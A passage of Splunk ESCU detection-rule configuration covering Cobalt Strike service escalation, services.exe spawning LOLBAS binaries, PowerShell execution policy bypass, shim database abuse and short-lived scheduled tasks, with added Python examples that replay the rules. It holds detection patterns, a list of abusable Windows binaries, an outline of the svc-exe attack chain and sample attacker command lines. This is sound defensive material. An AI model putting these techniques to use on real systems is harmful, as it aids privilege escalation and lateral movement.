network connection. During triage, review parallel processes and identify any additional file modifications. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. 
The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as `services.exe` should never spawn a process from `ADMIN$`. Filter as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Services Escalate Exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = A service process $parent_process_name$ with process path $process_path$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 76}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 76}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Services Escalate Exe - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 95, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of `svc-exe` with Cobalt Strike. 
The behavior typically follows after an adversary has already gained initial access and is escalating privileges. Using `svc-exe`, a randomly named binary will be downloaded from the remote Teamserver and placed on disk at `C:\Windows\400619a.exe`. Next, the binary will be added to the registry under key `HKLM\System\CurrentControlSet\Services\400619a\` with multiple keys and values added to look like a legitimate service. Upon loading, `services.exe` will spawn the randomly named binary from `\\127.0.0.1\ADMIN$\400619a.exe`. The process lineage is completed with `400619a.exe` spawning rundll32.exe, which is the default `spawnto_` value for Cobalt Strike. The `spawnto_` value is arbitrary and may be any process on disk (typically a system32/syswow64 binary). The `spawnto_` process will also make a network connection. During triage, review parallel processes and identify any additional file modifications. action.notable.param.rule_title = Services Escalate Exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe Processes.process_path=*admin$* by Processes.process_path Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `services_escalate_exe_filter` [ESCU - Services LOLBAS Execution Process Spawn - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `services.exe` spawning a LOLBAS execution 
process. When adversaries execute code on remote endpoints abusing the Service Control Manager and creating a remote malicious service, the executed command is spawned as a child process of `services.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of services.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543", "T1543.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies `services.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Service Control Manager and creating a remote malicious service, the executed command is spawned as a child process of `services.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of services.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
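Added example (not part of the ESCU content or the Splunk Threat Research Team's code) covering both the Services Escalate Exe search and the Services LOLBAS Execution Process Spawn search described above: each constructed Endpoint.Processes record is tested as a child of services.exe, first for a process_path containing ADMIN$ (the svc-exe pattern) and then for a process_name on the LOLBAS list. The LOLBAS set here is a subset of the names in the search; the sample records and process names are constructed. Note the difference in what the two searches see: in the svc-exe chain, rundll32.exe is spawned by the service binary, not directly by services.exe, so it is the ADMIN$ rule that fires on that chain, while the LOLBAS rule fires when the remote service's command is itself a LOLBAS binary.

```python
# Added example: evaluates children of services.exe against the conditions of
# "Services Escalate Exe" and "Services LOLBAS Execution Process Spawn". Not ESCU code.
from fnmatch import fnmatch

# Subset of the process names listed in the LOLBAS search on this page.
LOLBAS_NAMES = {n.lower() for n in (
    "Rundll32.exe", "Regsvr32.exe", "Mshta.exe", "Msiexec.exe", "Wmic.exe",
    "Schtasks.exe", "Cmstp.exe", "Msbuild.exe", "Installutil.exe", "Certoc.exe",
    "Bitsadmin.exe", "Netsh.exe", "Dllhost.exe", "Explorer.exe")}

# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # svc-exe: services.exe starts the dropped service binary via the admin share
    {"dest": "srv01", "user": "NT AUTHORITY\\SYSTEM", "parent_process_name": "services.exe",
     "process_name": "400619a.exe", "process_path": "\\\\127.0.0.1\\ADMIN$\\400619a.exe",
     "process": "\\\\127.0.0.1\\ADMIN$\\400619a.exe"},
    # remote service whose command is a LOLBAS binary
    {"dest": "srv01", "user": "NT AUTHORITY\\SYSTEM", "parent_process_name": "services.exe",
     "process_name": "rundll32.exe", "process_path": "C:\\Windows\\System32\\rundll32.exe",
     "process": "rundll32.exe C:\\Windows\\Temp\\x.dll,Start"},
    # ordinary service host: child of services.exe but neither condition holds
    {"dest": "srv01", "user": "NT AUTHORITY\\SYSTEM", "parent_process_name": "services.exe",
     "process_name": "svchost.exe", "process_path": "C:\\Windows\\System32\\svchost.exe",
     "process": "svchost.exe -k netsvcs -p"},
    # LOLBAS binary, but not a child of services.exe
    {"dest": "srv02", "user": "CORP\\jdoe", "parent_process_name": "cmd.exe",
     "process_name": "rundll32.exe", "process_path": "C:\\Windows\\System32\\rundll32.exe",
     "process": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def _like(value, pattern):
    """Case-insensitive wildcard match, like an SPL field=*pat* clause."""
    return fnmatch(value.lower(), pattern.lower())


def is_services_child(event):
    return event.get("parent_process_name", "").lower() == "services.exe"


def services_escalate_exe(event):
    """services.exe spawning a binary whose path contains ADMIN$."""
    return is_services_child(event) and _like(event.get("process_path", ""), "*admin$*")


def services_lolbas_spawn(event):
    """services.exe spawning a binary from the LOLBAS list."""
    return is_services_child(event) and event.get("process_name", "").lower() in LOLBAS_NAMES


def classify(events):
    """Return, per record, the list of rule names it would trigger."""
    out = []
    for e in events:
        hits = []
        if services_escalate_exe(e):
            hits.append("Services Escalate Exe")
        if services_lolbas_spawn(e):
            hits.append("Services LOLBAS Execution Process Spawn")
        out.append(hits)
    return out


if __name__ == "__main__":
    for e, hits in zip(SAMPLE_EVENTS, classify(SAMPLE_EVENTS)):
        print(e["dest"], e["process_name"], hits)
```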
action.escu.known_false_positives = Legitimate applications may trigger this behavior, filter as needed. action.escu.creation_date = 2021-11-22 action.escu.modification_date = 2021-11-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Services LOLBAS Execution Process Spawn - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land", "Qakbot", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Services.exe spawned a LOLBAS process on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Services LOLBAS Execution Process Spawn - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land", "Qakbot", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543", "T1543.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `services.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Service Control Manager and creating a remote malicious service, the executed command is spawned as a child process of `services.exe`. 
The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of services.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.notable.param.rule_title = Services LOLBAS Execution Process Spawn action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=services.exe) (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe", "Rasautou.exe", "Schtasks.exe", "Xwizard.exe", "Dllhost.exe", "Pnputil.exe", "Atbroker.exe", "Pcwrun.exe", "Ttdinject.exe","Mshta.exe", "Bitsadmin.exe", "Certoc.exe", "Ieexec.exe", "Microsoft.Workflow.Compiler.exe", "Runscripthelper.exe", "Forfiles.exe", "Msbuild.exe", "Register-cimprovider.exe", "Tttracer.exe", "Ie4uinit.exe", "Bash.exe", "Hh.exe", "SettingSyncHost.exe", "Cmstp.exe", "Mmc.exe", "Stordiag.exe", "Scriptrunner.exe", "Odbcconf.exe", "Extexport.exe", "Msdt.exe", "WorkFolders.exe", "Diskshadow.exe", "Mavinject.exe", "Regasm.exe", "Gpscript.exe", "Rundll32.exe", "Regsvr32.exe", "Msiexec.exe", "Wuauclt.exe", "Presentationhost.exe", "Wmic.exe", "Runonce.exe", "Syncappvpublishingserver.exe", "Verclsid.exe", "Infdefaultinstall.exe", "Explorer.exe", "Installutil.exe", "Netsh.exe", "Wab.exe", "Dnscmd.exe", "At.exe", "Pcalua.exe", "Msconfig.exe")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | 
`security_content_ctime(lastTime)` | `services_lolbas_execution_process_spawn_filter` [ESCU - Set Default PowerShell Execution Policy To Unrestricted or Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = Monitor for changes of the ExecutionPolicy in the registry to the values "unrestricted" or "bypass," which allows the execution of malicious scripts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Monitor for changes of the ExecutionPolicy in the registry to the values "unrestricted" or "bypass," which allows the execution of malicious scripts. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may attempt to change the default execution policy on a system for a variety of reasons. However, setting the policy to "unrestricted" or "bypass" as this search is designed to identify, would be unusual. Hits should be reviewed and investigated as appropriate. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Set Default PowerShell Execution Policy To Unrestricted or Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["HAFNIUM Group", "Hermetic Wiper", "Credential Dumping", "Malicious PowerShell", "Data Destruction", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = A registry modification in $registry_path$ with reg key $registry_key_name$ and reg value $registry_value_name$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 48}, {"risk_object_field": "registry_path", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Set Default PowerShell Execution Policy To Unrestricted or Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["HAFNIUM Group", "Hermetic Wiper", "Credential Dumping", "Malicious PowerShell", "Data Destruction", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Monitor for changes of the ExecutionPolicy in the registry to the values "unrestricted" or "bypass," which allows the execution of malicious scripts. 
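Added example (not part of the ESCU content or the Splunk Threat Research Team's code): the registry filter and the process/registry correlation used by this stanza's search, replayed in Python over constructed records. The join key in the search is process_guid alone (the `span=1h` bucketing only groups the tstats output), so the example joins on that field and keeps the first matching registry record per GUID, as an SPL `join` does by default. The registry path wildcard deliberately does not pin the hive, so both HKLM (`-Scope LocalMachine`) and HKCU (`-Scope CurrentUser`) writes match. The process_guid values and all records are constructed; the correlation only works in practice when the registry source (for example Sysmon Event ID 13) carries the same process GUID as the process-creation source.

```python
# Added example: replays the process/registry join of "Set Default PowerShell
# Execution Policy To Unrestricted or Bypass" over constructed records. Not ESCU code.
from fnmatch import fnmatch

# Same wildcard the search uses, with single backslashes at runtime.
REG_PATH_PATTERN = "*Software\\Microsoft\\Powershell\\1\\ShellIds\\Microsoft.PowerShell*"
RISKY_POLICIES = {"unrestricted", "bypass"}

# Constructed sample records; process_guid values are made up.
PROCESSES = [
    {"_time": 1700000100, "process_guid": "{A1}", "dest": "ws01", "user": "CORP\\jdoe",
     "process_name": "powershell.exe", "parent_process_name": "cmd.exe",
     "process": "powershell Set-ExecutionPolicy Bypass -Scope LocalMachine"},
    {"_time": 1700000200, "process_guid": "{B2}", "dest": "ws01", "user": "CORP\\jdoe",
     "process_name": "powershell.exe", "parent_process_name": "explorer.exe",
     "process": "powershell Set-ExecutionPolicy RemoteSigned"},
    {"_time": 1700000300, "process_guid": "{C3}", "dest": "ws02", "user": "CORP\\svc_build",
     "process_name": "reg.exe", "parent_process_name": "cmd.exe",
     "process": "reg add HKLM\\Software\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell"
                " /v ExecutionPolicy /t REG_SZ /d Unrestricted /f"},
    {"_time": 1700000400, "process_guid": "{D4}", "dest": "ws03", "user": "CORP\\asmith",
     "process_name": "powershell.exe", "parent_process_name": "explorer.exe",
     "process": "powershell Set-ExecutionPolicy Bypass -Scope CurrentUser"},
]
HKLM_POLICY = "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy"
HKCU_POLICY = "HKCU\\Software\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy"
REGISTRY = [
    {"_time": 1700000101, "process_guid": "{A1}", "registry_path": HKLM_POLICY,
     "registry_value_name": "ExecutionPolicy", "registry_value_data": "Bypass"},
    {"_time": 1700000201, "process_guid": "{B2}", "registry_path": HKLM_POLICY,
     "registry_value_name": "ExecutionPolicy", "registry_value_data": "RemoteSigned"},
    {"_time": 1700000301, "process_guid": "{C3}", "registry_path": HKLM_POLICY,
     "registry_value_name": "ExecutionPolicy", "registry_value_data": "Unrestricted"},
    {"_time": 1700000401, "process_guid": "{D4}", "registry_path": HKCU_POLICY,
     "registry_value_name": "ExecutionPolicy", "registry_value_data": "Bypass"},
    # Same value name and data under an unrelated key: must not match the path filter.
    {"_time": 1700000402, "process_guid": "{D4}",
     "registry_path": "HKCU\\Software\\Contoso\\App\\ExecutionPolicy",
     "registry_value_name": "ExecutionPolicy", "registry_value_data": "Bypass"},
]


def _like(value, pattern):
    return fnmatch(value.lower(), pattern.lower())


def risky_policy_write(reg):
    """Registry-side filter from the search: path, value name and value data."""
    return (_like(reg.get("registry_path", ""), REG_PATH_PATTERN)
            and reg.get("registry_value_name", "").lower() == "executionpolicy"
            and reg.get("registry_value_data", "").lower() in RISKY_POLICIES)


def join_policy_changes(processes, registry):
    """Inner join on process_guid: attribute each risky write to the process that made it."""
    by_guid = {}
    for r in registry:
        if risky_policy_write(r):
            by_guid.setdefault(r["process_guid"], r)   # first match wins, like SPL join
    hits = []
    for p in processes:
        r = by_guid.get(p["process_guid"])
        if r is None:
            continue
        hits.append({"dest": p["dest"], "user": p["user"], "process_name": p["process_name"],
                     "parent_process_name": p["parent_process_name"], "process": p["process"],
                     "registry_path": r["registry_path"],
                     "registry_value_data": r["registry_value_data"],
                     "process_guid": p["process_guid"]})
    return hits


if __name__ == "__main__":
    for h in join_policy_changes(PROCESSES, REGISTRY):
        print(h["dest"], h["process_name"], h["registry_value_data"], h["registry_path"])
```

The RemoteSigned write is dropped by the value filter and the Contoso key by the path filter; the three remaining writes are attributed to their originating process, including the reg.exe write that never involved powershell.exe.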
action.notable.param.rule_title = Set Default PowerShell Execution Policy To Unrestricted or Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=*Software\\Microsoft\\Powershell\\1\\ShellIds\\Microsoft.PowerShell* Registry.registry_value_name=ExecutionPolicy (Registry.registry_value_data=Unrestricted OR Registry.registry_value_data=Bypass)) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `set_default_powershell_execution_policy_to_unrestricted_or_bypass_filter` [ESCU - Shim Database File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for shim database files being written to default directories. The sdbinst.exe application is used to install shim database files (.sdb). 
According to Microsoft, a shim is a small library that transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for shim database files being written to default directories. The sdbinst.exe application is used to install shim database files (.sdb). According to Microsoft, a shim is a small library that transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. action.escu.known_false_positives = Because legitimate shim files are created and used all the time, this event, in itself, is not suspicious. However, if there are other correlating events, it may warrant further investigation. 
action.escu.creation_date = 2020-12-08 action.escu.modification_date = 2020-12-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Shim Database File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A shim database file was possibly written to $file_path$ on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "file_path", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Shim Database File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for shim database files being written to default directories. The sdbinst.exe application is used to install shim database files (.sdb). According to Microsoft, a shim is a small library that transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. 
action.notable.param.rule_title = Shim Database File Creation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Filesystem.action) values(Filesystem.file_hash) as file_hash values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path=*Windows\\AppPatch\\Custom* by Filesystem.file_name Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` |`drop_dm_object_name(Filesystem)` | `shim_database_file_creation_filter` [ESCU - Shim Database Installation With Suspicious Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects the process execution and arguments required to silently create a shim database. The sdbinst.exe application is used to install shim database files (.sdb). A shim is a small library which transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects the process execution and arguments required to silently create a shim database. The sdbinst.exe application is used to install shim database files (.sdb). A shim is a small library which transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = The search matches every execution of sdbinst.exe regardless of its arguments, so legitimate application installers that register compatibility fixes will also match. Filter as needed. action.escu.creation_date = 2020-11-23 action.escu.modification_date = 2020-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Shim Database Installation With Suspicious Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = Process $process_name$ possibly created a shim database silently on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Shim Database Installation With Suspicious Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", 
"Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects the process execution and arguments required to silently create a shim database. The sdbinst.exe application is used to install shim database files (.sdb). A shim is a small library which transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.notable.param.rule_title = Shim Database Installation With Suspicious Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = sdbinst.exe by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `shim_database_installation_with_suspicious_parameters_filter` [ESCU - Short Lived Scheduled Task - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes Windows Security EventCode 4698, "A scheduled task was created," and EventCode 4699, "A scheduled task was deleted," to identify scheduled tasks that are created and deleted within a short time frame of less than 30 seconds. This behavior is indicative of a potential lateral movement attack where the Task Scheduler is abused to achieve code execution. 
Both red teams and adversaries may exploit the Task Scheduler for lateral movement and remote code execution.\ To implement this analytic, ensure that you are ingesting Windows Security Event Logs with EventCode 4698 enabled. Additionally, the Windows TA (Technology Add-on) is required to parse and extract the necessary information from the logs.\ It's important to note that while uncommon, legitimate applications may create and delete scheduled tasks within a short duration. Analysts should filter the results based on the specific context and environment to reduce false positives.\ Identifying short-lived scheduled tasks is valuable for a SOC as it can indicate malicious activities attempting to move laterally or execute unauthorized code on Windows systems. By detecting and investigating these events, security analysts can respond promptly to prevent further compromise and mitigate potential risks. The impact of a true positive could range from unauthorized access to data exfiltration or the execution of malicious payloads. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes Windows Security EventCode 4698, "A scheduled task was created," and EventCode 4699, "A scheduled task was deleted," to identify scheduled tasks that are created and deleted within a short time frame of less than 30 seconds. This behavior is indicative of a potential lateral movement attack where the Task Scheduler is abused to achieve code execution. Both red teams and adversaries may exploit the Task Scheduler for lateral movement and remote code execution.\ To implement this analytic, ensure that you are ingesting Windows Security Event Logs with EventCode 4698 enabled. 
Additionally, the Windows TA (Technology Add-on) is required to parse and extract the necessary information from the logs.\ It's important to note that while uncommon, legitimate applications may create and delete scheduled tasks within a short duration. Analysts should filter the results based on the specific context and environment to reduce false positives.\ Identifying short-lived scheduled tasks is valuable for a SOC as it can indicate malicious activities attempting to move laterally or execute unauthorized code on Windows systems. By detecting and investigating these events, security analysts can respond promptly to prevent further compromise and mitigate potential risks. The impact of a true positive could range from unauthorized access to data exfiltration or the execution of malicious payloads. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4698 EventCode enabled. The Windows TA is also required. action.escu.known_false_positives = Although uncommon, legitimate applications may create and delete a Scheduled Task within 30 seconds. Filter as needed. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Short Lived Scheduled Task - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["CISA AA23-347A", "Active Directory Lateral Movement", "Scheduled Tasks", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = A windows scheduled task was created and deleted in 30 seconds on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Short Lived Scheduled Task - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Active Directory Lateral Movement", "Scheduled Tasks", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005"], "nist": ["DE.CM"]} schedule_window = 